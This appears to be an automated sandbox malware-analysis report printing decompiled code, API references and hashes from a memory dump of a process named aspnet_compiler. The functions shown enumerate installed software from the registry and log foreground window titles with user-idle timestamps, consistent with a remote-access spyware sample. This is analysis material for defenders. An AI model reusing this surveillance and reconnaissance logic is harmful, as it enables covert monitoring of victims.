                    																										 *(_t221 + _t290) = E004443F4(_t262, _t95, 1);
                    																										E00445002(0);
                    																										_t323 = _t323 + 0xc;
                    																										__eflags =  *(_t221 + _t290);
                    																										if( *(_t221 + _t290) == 0) {
                    																											goto L102;
                    																										} else {
                    																											_t180 = E0044030E( *(_t221 + _t290), _v16,  *_t290);
                    																											_t323 = _t323 + 0xc;
                    																											__eflags = _t180;
                    																											if(_t180 != 0) {
                    																												L103:
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												_push(0);
                    																												E0043A5E8();
                    																												asm("int3");
                    																												_push(_t317);
                    																												_t318 = _t323;
                    																												_push(_t262);
                    																												_push(_t262);
                    																												_push(_t290);
                    																												_t291 = _v128;
                    																												__eflags = _t291;
                    																												if(_t291 != 0) {
                    																													_push(_t221);
                    																													_t223 = 0;
                    																													_t156 = _t291;
                    																													_t263 = 0;
                    																													_v20 = 0;
                    																													_push(_t305);
                    																													__eflags =  *_t291;
                    																													if( *_t291 != 0) {
                    																														do {
                    																															_t156 =  &(_t156[1]);
                    																															_t263 = _t263 + 1;
                    																															__eflags =  *_t156;
                    																														} while ( *_t156 != 0);
                    																													}
                    																													_t104 = _t263 + 1; // 0x2
                    																													_t306 = E004443F4(_t263, _t104, 4);
                    																													__eflags = _t306;
                    																													if(_t306 == 0) {
                    																														L119:
                    																														E004449F5(_t223, _t284, _t291, _t306);
                    																														goto L120;
                    																													} else {
                    																														__eflags =  *_t291 - _t223;
                    																														if( *_t291 == _t223) {
                    																															L117:
                    																															E00445002(_t223);
                    																															_t167 = _t306;
                    																															goto L118;
                    																														} else {
                    																															_t223 = _t306 - _t291;
                    																															__eflags = _t223;
                    																															do {
                    																																_t267 =  *_t291;
                    																																_t105 = _t267 + 2; // 0x6
                    																																_t284 = _t105;
                    																																do {
                    																																	_t168 =  *_t267;
                    																																	_t267 = _t267 + 2;
                    																																	__eflags = _t168 - _v20;
                    																																} while (_t168 != _v20);
                    																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                    																																_v24 = _t107;
                    																																 *(_t223 + _t291) = E004443F4(_t267 - _t284 >> 1, _t107, 2);
                    																																E00445002(0);
                    																																_t323 = _t323 + 0xc;
                    																																__eflags =  *(_t223 + _t291);
                    																																if( *(_t223 + _t291) == 0) {
                    																																	goto L119;
                    																																} else {
                    																																	_t173 = E004463E1( *(_t223 + _t291), _v24,  *_t291);
                    																																	_t323 = _t323 + 0xc;
                    																																	__eflags = _t173;
                    																																	if(_t173 != 0) {
                    																																		L120:
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		_push(0);
                    																																		E0043A5E8();
                    																																		asm("int3");
                    																																		_push(_t318);
                    																																		_push(_t223);
                    																																		_push(_t306);
                    																																		_push(_t291);
                    																																		_t292 =  *0x4704e0; // 0xec46b8
                    																																		_t307 = _t292;
                    																																		__eflags =  *_t292;
                    																																		if( *_t292 == 0) {
                    																																			L127:
                    																																			_t308 = _t307 - _t292;
                    																																			__eflags = _t308;
                    																																			_t310 =  ~(_t308 >> 2);
                    																																		} else {
                    																																			_t225 = _v8;
                    																																			do {
                    																																				_t163 = E004481E9(_v12,  *_t307, _t225);
                    																																				_t323 = _t323 + 0xc;
                    																																				__eflags = _t163;
                    																																				if(_t163 != 0) {
                    																																					goto L126;
                    																																				} else {
                    																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                    																																					__eflags = _t165 - 0x3d;
                    																																					if(_t165 == 0x3d) {
                    																																						L129:
                    																																						_t310 = _t307 - _t292 >> 2;
                    																																					} else {
                    																																						__eflags = _t165;
                    																																						if(_t165 == 0) {
                    																																							goto L129;
                    																																						} else {
                    																																							goto L126;
                    																																						}
                    																																					}
                    																																				}
                    																																				goto L128;
                    																																				L126:
                    																																				_t307 =  &(_t307[1]);
                    																																				__eflags =  *_t307;
                    																																			} while ( *_t307 != 0);
                    																																			goto L127;
                    																																		}
                    																																		L128:
                    																																		return _t310;
                    																																	} else {
                    																																		goto L115;
                    																																	}
                    																																}
                    																																goto L130;
                    																																L115:
                    																																_t291 = _t291 + 4;
                    																																__eflags =  *_t291 - _t173;
                    																															} while ( *_t291 != _t173);
                    																															_t223 = 0;
                    																															__eflags = 0;
                    																															goto L117;
                    																														}
                    																													}
                    																												} else {
                    																													_t167 = 0;
                    																													L118:
                    																													return _t167;
                    																												}
                    																											} else {
                    																												goto L98;
                    																											}
                    																										}
                    																										goto L130;
                    																										L98:
                    																										_t290 = _t290 + 4;
                    																										__eflags =  *_t290 - _t180;
                    																									} while ( *_t290 != _t180);
                    																									goto L100;
                    																								}
                    																							}
                    																						} else {
                    																							_t175 = 0;
                    																							L101:
                    																							return _t175;
                    																						}
                    																					} else {
                    																						_t274 =  &(_t304[_v20 + 1]);
                    																						 *(_t274 - 2) = _t148;
                    																						asm("sbb eax, eax");
                    																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                    																						__eflags = _t185;
                    																						if(_t185 == 0) {
                    																							_t186 = E0043EEAD();
                    																							_t221 = _t221 | 0xffffffff;
                    																							__eflags = _t221;
                    																							 *_t186 = 0x2a;
                    																						}
                    																						goto L85;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	}
                    																} else {
                    																	_t191 =  *0x4704e0; // 0xec46b8
                    																	__eflags = _a4 - _t221;
                    																	if(_a4 == _t221) {
                    																		L58:
                    																		__eflags = _t246;
                    																		if(_t246 != 0) {
                    																			goto L56;
                    																		} else {
                    																			__eflags = _t191;
                    																			if(_t191 != 0) {
                    																				L62:
                    																				 *0x4704e4 = E004443F4(_t246, 1, 4);
                    																				E00445002(_t221);
                    																				_t322 = _t322 + 0xc;
                    																				goto L63;
                    																			} else {
                    																				 *0x4704e0 = E004443F4(_t246, 1, 4);
                    																				E00445002(_t221);
                    																				_t322 = _t322 + 0xc;
                    																				__eflags =  *0x4704e0 - _t221; // 0xec46b8
                    																				if(__eflags == 0) {
                    																					goto L55;
                    																				} else {
                    																					_t302 =  *0x4704e4; // 0xecda90
                    																					__eflags = _t302;
                    																					if(_t302 != 0) {
                    																						goto L64;
                    																					} else {
                    																						goto L62;
                    																					}
                    																				}
                    																			}
                    																		}
                    																	} else {
                    																		__eflags = _t191;
                    																		if(_t191 == 0) {
                    																			goto L58;
                    																		} else {
                    																			_t196 = L004424A7(_t221);
                    																			__eflags = _t196;
                    																			if(_t196 != 0) {
                    																				L63:
                    																				_t302 =  *0x4704e4; // 0xecda90
                    																				__eflags = _t302;
                    																				if(_t302 == 0) {
                    																					L55:
                    																					_t221 = _t220 | 0xffffffff;
                    																					__eflags = _t221;
                    																					L56:
                    																					E00445002(_t288);
                    																					_t136 = _t221;
                    																					goto L57;
                    																				} else {
                    																					goto L64;
                    																				}
                    																			} else {
                    																				goto L54;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t197 = E0043EEAD();
                    														 *_t197 = 0x16;
                    														_t136 = _t197 | 0xffffffff;
                    														L57:
                    														return _t136;
                    													}
                    												} else {
                    													_t280 = _v16 + 1 + _t300 - _a4;
                    													asm("sbb eax, eax");
                    													 *(_t280 - 1) = _t218;
                    													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                    													__eflags = _t204;
                    													if(_t204 == 0) {
                    														_t205 = E0043EEAD();
                    														_t218 = _t218 | 0xffffffff;
                    														__eflags = _t218;
                    														 *_t205 = 0x2a;
                    													}
                    													goto L42;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								__eflags = _a8;
                    								if(_a8 == 0) {
                    									L14:
                    									__eflags = _t120;
                    									if(_t120 == 0) {
                    										 *0x4704e0 = E004443F4(_t231, 1, 4);
                    										E00445002(_t218);
                    										_t298 =  *0x4704e0; // 0xec46b8
                    										_t320 = _t320 + 0xc;
                    										__eflags = _t298;
                    										if(_t298 == 0) {
                    											goto L11;
                    										} else {
                    											__eflags =  *0x4704e4 - _t218; // 0xecda90
                    											if(__eflags != 0) {
                    												goto L20;
                    											} else {
                    												 *0x4704e4 = E004443F4(_t231, 1, 4);
                    												E00445002(_t218);
                    												_t320 = _t320 + 0xc;
                    												__eflags =  *0x4704e4 - _t218; // 0xecda90
                    												if(__eflags == 0) {
                    													goto L11;
                    												} else {
                    													goto L19;
                    												}
                    											}
                    										}
                    									} else {
                    										_t218 = 0;
                    										goto L12;
                    									}
                    								} else {
                    									__eflags =  *0x4704e4 - _t218; // 0xecda90
                    									if(__eflags == 0) {
                    										goto L14;
                    									} else {
                    										_t214 = L004424A2(0);
                    										__eflags = _t214;
                    										if(_t214 != 0) {
                    											L19:
                    											_t298 =  *0x4704e0; // 0xec46b8
                    											L20:
                    											__eflags = _t298;
                    											if(_t298 == 0) {
                    												L11:
                    												_t218 = _t217 | 0xffffffff;
                    												__eflags = _t218;
                    												L12:
                    												E00445002(_t286);
                    												_t119 = _t218;
                    												goto L13;
                    											} else {
                    												goto L21;
                    											}
                    										} else {
                    											goto L10;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t215 = E0043EEAD();
                    					 *_t215 = 0x16;
                    					_t119 = _t215 | 0xffffffff;
                    					L13:
                    					return _t119;
                    				}
                    				L130:
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable$_wcschr
                    • String ID:
                    • API String ID: 3899193279-0
                    • Opcode ID: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                    • Instruction ID: 70a147eeefff8d80a420db1d2de74d9c70af01ffcddfc6d33a5ace776a2fbf8c
                    • Opcode Fuzzy Hash: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                    • Instruction Fuzzy Hash: B0D137B1D01701ABFB30AF76D882A6E7BA4AF05718F04456FF94597382EB3D9840879C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004140CD() {
                    				char _v264;
                    				char _v532;
                    				intOrPtr _v536;
                    				CHAR* _v540;
                    				intOrPtr _v544;
                    				CHAR* _v548;
                    				intOrPtr _v552;
                    				_Unknown_base(*)()* _t42;
                    				signed int _t52;
                    				struct HINSTANCE__* _t54;
                    				struct HINSTANCE__* _t57;
                    				intOrPtr* _t63;
                    				void* _t64;
                    
                    				 *_t63 = "getaddrinfo";
                    				_v552 = E00413C51;
                    				_v548 = "getnameinfo";
                    				_v544 = E00413EF7;
                    				_v540 = "freeaddrinfo";
                    				_v536 = E00413C16;
                    				if( *0x474a88 == 0) {
                    					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
                    						E0044030E( &_v532, 0x10c,  &_v264);
                    						E00440368( &_v532, 0x10c, "\\ws2_32");
                    						_t64 = _t63 + 0x18;
                    						_t57 = LoadLibraryA( &_v532);
                    						_t54 = 0;
                    						if(_t57 == 0) {
                    							L6:
                    							E0044030E( &_v532, 0x10c,  &_v264);
                    							E00440368( &_v532, 0x10c, "\\wship6");
                    							_t64 = _t64 + 0x18;
                    							_t57 = LoadLibraryA( &_v532);
                    							if(_t57 != 0) {
                    								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                    									FreeLibrary(_t57);
                    									_t57 = _t54;
                    								}
                    								if(_t57 != 0) {
                    									goto L10;
                    								}
                    							}
                    						} else {
                    							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                    								FreeLibrary(_t57);
                    								_t57 = 0;
                    							}
                    							if(_t57 != 0) {
                    								L10:
                    								_t52 = _t54;
                    								while(1) {
                    									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
                    									 *(_t64 + 0x14 + _t52 * 8) = _t42;
                    									if(_t42 == 0) {
                    										break;
                    									}
                    									_t52 = _t52 + 1;
                    									if(_t52 < 3) {
                    										continue;
                    									} else {
                    									}
                    									L15:
                    									if(_t57 != 0) {
                    										do {
                    											 *((intOrPtr*)(_t54 + 0x46f9fc)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
                    											_t54 = _t54 + 8;
                    										} while (_t54 < 0x18);
                    									}
                    									goto L17;
                    								}
                    								FreeLibrary(_t57);
                    								_t57 = _t54;
                    								goto L15;
                    							} else {
                    								goto L6;
                    							}
                    						}
                    						L17:
                    					}
                    					 *0x474a88 = 1;
                    				}
                    				return  *0x46f9fc;
                    			}

                    APIs
                    • GetSystemDirectoryA.KERNEL32 ref: 0041411C
                    • LoadLibraryA.KERNEL32(?), ref: 0041415E
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                    • FreeLibrary.KERNEL32(00000000), ref: 00414185
                    • LoadLibraryA.KERNEL32(?), ref: 004141BD
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                    • FreeLibrary.KERNEL32(00000000), ref: 004141D6
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                    • FreeLibrary.KERNEL32(00000000), ref: 004141FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                    • API String ID: 2490988753-744132762
                    • Opcode ID: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                    • Instruction ID: ec032a2b9b2afcf1944104fdbdee5c9b5016f8d194ad9eb48286684fedf55356
                    • Opcode Fuzzy Hash: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                    • Instruction Fuzzy Hash: 4A31B1B250671167D320DF65DC48ECB7ADCAB84794F040A6AF844A3201E73CDAD48BAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0041B008(void* __ebx, void* __ecx, void* __edx) {
                    				char _v1028;
                    				char _v1052;
                    				void* _v1056;
                    				char _v1076;
                    				void* _v1080;
                    				char _v1100;
                    				void* _v1104;
                    				char _v1124;
                    				void* _v1128;
                    				char _v1148;
                    				void* _v1152;
                    				char _v1172;
                    				void* _v1176;
                    				char _v1196;
                    				void* _v1200;
                    				char _v1220;
                    				void* _v1224;
                    				char _v1244;
                    				void* _v1248;
                    				char _v1268;
                    				void* _v1272;
                    				char _v1292;
                    				void* _v1296;
                    				char _v1316;
                    				void* _v1320;
                    				char _v1340;
                    				char _v1364;
                    				char _v1388;
                    				char _v1412;
                    				char _v1436;
                    				char _v1460;
                    				void* _v1464;
                    				char _v1484;
                    				int _v1488;
                    				void* _v1492;
                    				void* _v1496;
                    				void* __edi;
                    				void* __ebp;
                    				long _t73;
                    				long _t79;
                    				int _t86;
                    				void* _t188;
                    				int _t207;
                    				void* _t208;
                    				void* _t210;
                    				void** _t211;
                    
                    				_t188 = __edx;
                    				_t130 = __ebx;
                    				_t211 =  &_v1496;
                    				_t208 = __ecx;
                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
                    					_v1488 = 0x400;
                    					_t207 = 0;
                    					E00401F66(__ebx,  &_v1460);
                    					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
                    					_t210 = RegCloseKey;
                    					while(1) {
                    						__eflags = _t73 - 0x103;
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _t73;
                    						if(_t73 != 0) {
                    							L8:
                    							_t207 = _t207 + 1;
                    							__eflags = _t207;
                    							_v1488 = 0x400;
                    						} else {
                    							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
                    							__eflags = _t79;
                    							if(_t79 == 0) {
                    								E0041296F( &_v1484, _v1496, L"DisplayName");
                    								 *_t211 = L"Publisher";
                    								E0041296F( &_v1340, _v1496);
                    								 *_t211 = L"DisplayVersion";
                    								E0041296F( &_v1364, _v1496);
                    								 *_t211 = L"InstallLocation";
                    								E0041296F( &_v1388, _v1496);
                    								 *_t211 = L"InstallDate";
                    								E0041296F( &_v1412, _v1496);
                    								 *_t211 = L"UninstallString";
                    								E0041296F( &_v1436, _v1496);
                    								_t86 = E0040619C();
                    								__eflags = _t86;
                    								if(_t86 == 0) {
                    									E0040323D(E00402FF4(_t130,  &_v1316, E00402FF4(_t130,  &_v1292, E004042FD(_t130,  &_v1268, E00402FF4(_t130,  &_v1244, E004042FD(_t130,  &_v1220, E00402FF4(_t130,  &_v1196, E004042FD(_t130,  &_v1172, E00402FF4(_t130,  &_v1148, E004042FD(_t130,  &_v1124, E00402FF4(_t130,  &_v1100, E004042FD(_t130,  &_v1076, E004087F0( &_v1052,  &_v1484, _t210, "\t"), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, _t149), _t207, _t210, __eflags, "\n"));
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    									E00401EE9();
                    								}
                    								RegCloseKey(_v1496);
                    								E00401EE9();
                    								E00401EE9();
                    								E00401EE9();
                    								E00401EE9();
                    								E00401EE9();
                    								E00401EE9();
                    								goto L8;
                    							}
                    						}
                    						__eflags = 0;
                    						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
                    					}
                    					RegCloseKey(_v1492);
                    					E00403242(_t130, _t208, _t210, __eflags,  &_v1460);
                    					E00401EE9();
                    				} else {
                    					E0040415E(__ebx, _t208, _t188, 0, 0x46a8f0);
                    				}
                    				return _t208;
                    			}

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B02A
                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B06E
                    • RegCloseKey.ADVAPI32(?), ref: 0041B338
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 5d3854b725c00038904661a9ed4b5ae5e0eaf187c07e43597808e73792df7bc4
                    • Instruction ID: 996ba4e169512d105bf10ccdef0111c5bf25efe0ecf00969fbd19f1ec1e96d73
                    • Opcode Fuzzy Hash: 5d3854b725c00038904661a9ed4b5ae5e0eaf187c07e43597808e73792df7bc4
                    • Instruction Fuzzy Hash: 688123711082459BD324EB51D891EEFB3E8EF94308F50493FF586921D2EF349949CA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040A249(void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v56;
                    				char _v76;
                    				char _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v108;
                    				char _v112;
                    				struct HWND__* _v116;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				int _t36;
                    				struct HWND__* _t42;
                    				void* _t50;
                    				int _t57;
                    				struct HWND__* _t77;
                    				void* _t119;
                    				void* _t125;
                    				signed int _t126;
                    				void* _t128;
                    
                    				_t112 = __edx;
                    				_t128 = (_t126 & 0xfffffff8) - 0x74;
                    				_push(_t77);
                    				_push(0xea60);
                    				_t119 = __ecx;
                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    					Sleep(0x1f4);
                    					_t77 = GetForegroundWindow();
                    					_t36 = GetWindowTextLengthW(_t77);
                    					_t4 = _t36 + 1; // 0x1
                    					E0040AE7E(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
                    					if(_t36 != 0) {
                    						_t57 = E0040245C();
                    						GetWindowTextW(_t77, E00401EE4( &_v100), _t57);
                    						_t112 = 0x474c34;
                    						if(E0040AF46(0x474c34) == 0) {
                    							E0040AE66(0x474c34,  &_v100);
                    							E004086B8(E0040245C() - 1);
                    							_t128 = _t128 - 0x18;
                    							_t137 =  *0x47308b;
                    							if( *0x47308b == 0) {
                    								_t112 = E0040AEF6( &_v76, L"\r\n[", _t125,  &_v108);
                    								E00402FF4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
                    								E00409BA9(_t119);
                    								E00401EE9();
                    							} else {
                    								E004086D0(_t77, _t128, 0x474c34, _t137,  &_v108);
                    								E0040A6DA(_t77, _t119, _t137);
                    							}
                    						}
                    					}
                    					_t83 = _t119;
                    					E0040ACBE(_t119);
                    					if(E0041A641(_t119) < 0xea60) {
                    						L18:
                    						E00401EE9();
                    						continue;
                    					} else {
                    						_t77 = _v116;
                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    							_t42 = E0041A641(_t83);
                    							if(_t42 < 0xea60) {
                    								__eflags = _t77 % 0xea60;
                    								E00440751(_t83, _t77 / 0xea60,  &_v112, 0xa);
                    								_t50 = E00408832(_t77,  &_v80, E004052DD(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402073(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
                    								_t128 = _t128 + 0xc - 0x14;
                    								_t112 = _t50;
                    								E0041A7B9(_t128, _t50);
                    								E00409BA9(_t119);
                    								E00401FB8();
                    								E00401FB8();
                    								E00401FB8();
                    								goto L18;
                    							}
                    							_t77 = _t42;
                    							_v116 = _t77;
                    							Sleep(0x3e8);
                    						}
                    						E00401EE9();
                    						break;
                    					}
                    				}
                    				__eflags = 0;
                    				return 0;
                    			}

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040A2AB
                    • Sleep.KERNEL32(000001F4), ref: 0040A2B6
                    • GetForegroundWindow.USER32 ref: 0040A2BC
                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A2C5
                    • GetWindowTextW.USER32 ref: 0040A2F9
                    • Sleep.KERNEL32(000003E8), ref: 0040A3C7
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$4LG$4LG$4LG$]
                    • API String ID: 911427763-2724478313
                    • Opcode ID: 169f969ac849e0fe77356033552f853f150fe819bbc07c61be17f1031f358252
                    • Instruction ID: e6d26ec29f6efd9614cca4dfe6135636dd5a7624a68a80ed8f9da63f1efc7c64
                    • Opcode Fuzzy Hash: 169f969ac849e0fe77356033552f853f150fe819bbc07c61be17f1031f358252
                    • Instruction Fuzzy Hash: 3351C3316083405BC314FB71D886A6F77A5AB94308F40097FF886A62E2DF7C9A55C69F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0041BE9A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				struct tagPOINT _v12;
                    				void* _t16;
                    				struct HMENU__* _t17;
                    				void* _t20;
                    				void* _t24;
                    
                    				_t16 = _a8 - 1;
                    				if(_t16 == 0) {
                    					_t17 = CreatePopupMenu();
                    					 *0x472b1c = _t17;
                    					AppendMenuA(_t17, 0, 0, "Close");
                    					L15:
                    					return 0;
                    				}
                    				_t20 = _t16 - 0x110;
                    				if(_t20 == 0) {
                    					if(_a12 != 0) {
                    						goto L15;
                    					}
                    					Shell_NotifyIconA(2, 0x472b20);
                    					ExitProcess(0);
                    				}
                    				if(_t20 == 0x2f0) {
                    					_t24 = _a16 - 0x201;
                    					if(_t24 == 0) {
                    						if(IsWindowVisible( *0x472b10) == 0) {
                    							ShowWindow( *0x472b10, 9);
                    							SetForegroundWindow( *0x472b10);
                    						} else {
                    							ShowWindow( *0x472b10, 0);
                    						}
                    						goto L15;
                    					}
                    					if(_t24 == 3) {
                    						GetCursorPos( &_v12);
                    						SetForegroundWindow(_a4);
                    						TrackPopupMenu( *0x472b1c, 0, _v12, _v12.y, 0, _a4, 0);
                    						goto L15;
                    					}
                    					_push(_a16);
                    					_push(_a12);
                    					_push(0x401);
                    					L7:
                    					return DefWindowProcA(_a4, ??, ??, ??);
                    				}
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_a8);
                    				goto L7;
                    			}

                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041BEE5
                    • GetCursorPos.USER32(?), ref: 0041BEF4
                    • SetForegroundWindow.USER32(?), ref: 0041BEFD
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041BF17
                    • Shell_NotifyIconA.SHELL32(00000002,00472B20), ref: 0041BF68
                    • ExitProcess.KERNEL32 ref: 0041BF70
                    • CreatePopupMenu.USER32 ref: 0041BF76
                    • AppendMenuA.USER32 ref: 0041BF8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                    • Instruction ID: dfe43188851c1a6f81b140f94b5f6a7c696d7e25908ee8c8785907bb885635e0
                    • Opcode Fuzzy Hash: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                    • Instruction Fuzzy Hash: AC212631108209BFDB054FA4ED0DEAA3B65FB08312F104539FE05A01B1D7B6D9A1EF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00444657(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				signed int _v8;
                    				char _v21;
                    				intOrPtr _v22;
                    				struct _cpinfo _v28;
                    				void* _v32;
                    				void* _v36;
                    				void* _v40;
                    				intOrPtr* _v44;
                    				signed int _v48;
                    				void* _v52;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				intOrPtr* _v64;
                    				signed int* _v68;
                    				void* _v72;
                    				char _v76;
                    				signed int _t101;
                    				signed int _t123;
                    				signed short _t126;
                    				void* _t130;
                    				void* _t134;
                    				void* _t137;
                    				void* _t138;
                    				intOrPtr _t139;
                    				void* _t141;
                    				signed int _t142;
                    				intOrPtr* _t143;
                    				signed char _t160;
                    				signed char _t165;
                    				signed int _t166;
                    				void* _t168;
                    				signed int _t170;
                    				void* _t179;
                    				signed int* _t180;
                    				signed int* _t181;
                    				signed int _t182;
                    				signed char* _t189;
                    				signed char* _t190;
                    				signed int _t192;
                    				void* _t193;
                    				intOrPtr _t197;
                    				short* _t209;
                    				intOrPtr* _t211;
                    				intOrPtr* _t215;
                    				signed int _t216;
                    				signed int _t217;
                    				void* _t218;
                    				void* _t219;
                    
                    				_t101 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t101 ^ _t217;
                    				_t211 = _a4;
                    				_t170 = 0;
                    				_v64 = _t211;
                    				_v32 = 0;
                    				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                    				_v36 = 0;
                    				_v40 = 0;
                    				_v52 = 0;
                    				_v76 = _t211;
                    				_v72 = 0;
                    				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                    					__eflags =  *(_t211 + 0x8c);
                    					if( *(_t211 + 0x8c) != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					 *(_t211 + 0x8c) = _t170;
                    					__eflags = 0;
                    					 *(_t211 + 0x90) = _t170;
                    					 *_t211 = 0x45b890;
                    					 *((intOrPtr*)(_t211 + 0x94)) = 0x45bb10;
                    					 *((intOrPtr*)(_t211 + 0x98)) = 0x45bc90;
                    					 *((intOrPtr*)(_t211 + 4)) = 1;
                    					L41:
                    					return E004338BB(_v8 ^ _t217);
                    				}
                    				_t106 = _t211 + 8;
                    				_v44 = 0;
                    				if( *(_t211 + 8) != 0) {
                    					L3:
                    					_v44 = E004443F4(_t172, 1, 4);
                    					E00445002(_t170);
                    					_v32 = E004443F4(_t172, 0x180, 2);
                    					E00445002(_t170);
                    					_v36 = E004443F4(_t172, 0x180, 1);
